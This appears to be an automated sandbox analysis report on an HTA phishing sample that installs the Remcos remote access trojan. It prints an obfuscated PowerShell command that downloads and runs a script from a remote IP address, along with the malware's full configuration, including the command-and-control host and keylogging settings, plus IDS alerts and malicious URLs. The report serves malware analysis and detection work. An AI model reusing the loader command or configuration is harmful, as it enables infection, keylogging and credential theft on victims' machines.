[System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadrilog
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline", ProcessId: 7544, ProcessName: csc.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 8052, TargetFilename: C:\ProgramData\remcos\logs.dat
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-14T06:13:20.415125+010020204251Exploit Kit Activity Detected172.245.123.780192.168.2.449738TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-14T06:13:20.415125+010020204241Exploit Kit Activity Detected172.245.123.780192.168.2.449738TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-14T06:13:21.437625+010020365941Malware Command and Control Activity Detected192.168.2.449739172.245.123.128690TCP
                        2025-01-14T06:13:22.625149+010020365941Malware Command and Control Activity Detected192.168.2.449741172.245.123.128690TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-14T06:12:59.964053+010020576351A Network Trojan was detected172.245.123.780192.168.2.449738TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-14T06:13:22.592949+010028033043Unknown Traffic192.168.2.449740178.237.33.5080TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-14T06:12:59.964053+010028582951A Network Trojan was detected172.245.123.780192.168.2.449738TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-14T06:13:00.454329+010028587951A Network Trojan was detected192.168.2.449730172.245.123.780TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["172.245.123.12:8690:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ET2B3I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Source: verynicegirlwalkingarounftheworldmuuuah.htaVirustotal: Detection: 13%Perma Link
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4104782435.0000000002EAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432B45 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_00432B45
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_88c54551-6

                        Exploits

                        barindex
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                        Phishing

                        barindex
                        Source: Yara matchFile source: verynicegirlwalkingarounftheworldmuuuah.hta, type: SAMPLE
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.1944409134.00000000074BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1942564725.0000000006F20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.1944409134.00000000074BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1942564725.0000000006F20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.pdb source: powershell.exe, 00000003.00000002.1774693140.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.1944409134.00000000074BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1942564725.0000000006F20000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B63A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418E5F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 172.245.123.7:80
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 172.245.123.12:8690
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 172.245.123.12:8690
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.245.123.7:80 -> 192.168.2.4:49738
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.245.123.7:80 -> 192.168.2.4:49738
                        Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.245.123.7:80 -> 192.168.2.4:49738
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.245.123.7:80 -> 192.168.2.4:49738
                        Source: Malware configuration extractorIPs: 172.245.123.12
                        Source: global trafficHTTP traffic detected: GET /77/kissingbestthingswithgreatdayscomingforhim.txt HTTP/1.1Host: 172.245.123.7Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewIP Address: 172.245.123.12 172.245.123.12
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
                        Source: global trafficHTTP traffic detected: GET /77/seethebestthingsforgetmebackwithgoodnewsthings.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.7Connection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.7
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00907A18 URLDownloadToFileW,3_2_00907A18
                        Source: global trafficHTTP traffic detected: GET /77/seethebestthingsforgetmebackwithgoodnewsthings.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.7Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /77/kissingbestthingswithgreatdayscomingforhim.txt HTTP/1.1Host: 172.245.123.7Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                        Source: CasPol.exe, CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                        Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: CasPol.exe, 0000000D.00000002.1949326180.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                        Source: CasPol.exe, 0000000D.00000002.1949326180.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                        Source: CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                        Source: CasPol.exe, 0000000D.00000002.1946498945.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: powershell.exe, 00000003.00000002.1777884183.0000000006DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.7/
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.7/77/seethebe
                        Source: powershell.exe, 00000003.00000002.1779425802.0000000007C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.7/77/seethebestthingsforgetmebackwithgoodnewsthings.tIF
                        Source: powershell.exe, 00000003.00000002.1777596640.0000000006D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.7/77/seethebestthingsforgetmebackwithgoodnewsthings.tIFMSIL
                        Source: bhvEC00.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: bhvEC00.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: powershell.exe, 00000007.00000002.1914783591.0000000002FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftX
                        Source: bhvEC00.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: bhvEC00.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: bhvEC00.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: CasPol.exe, CasPol.exe, 0000000C.00000002.4102227044.0000000001363000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: powershell.exe, 00000003.00000002.1776250099.000000000575C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: bhvEC00.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000003.00000002.1774693140.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000004D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: CasPol.exe, CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                        Source: CasPol.exe, CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                        Source: CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                        Source: CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                        Source: CasPol.exe, 0000000D.00000002.1947882801.0000000000EEF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                        Source: CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                        Source: powershell.exe, 00000003.00000002.1779425802.0000000007CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..winsvr
                        Source: powershell.exe, 00000003.00000002.1774693140.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000004D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004849000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: seethebestthingsforgetmebackwithgoodnewsthi.vbS.3.drString found in binary or memory: https://github.com/koswald/VBScript
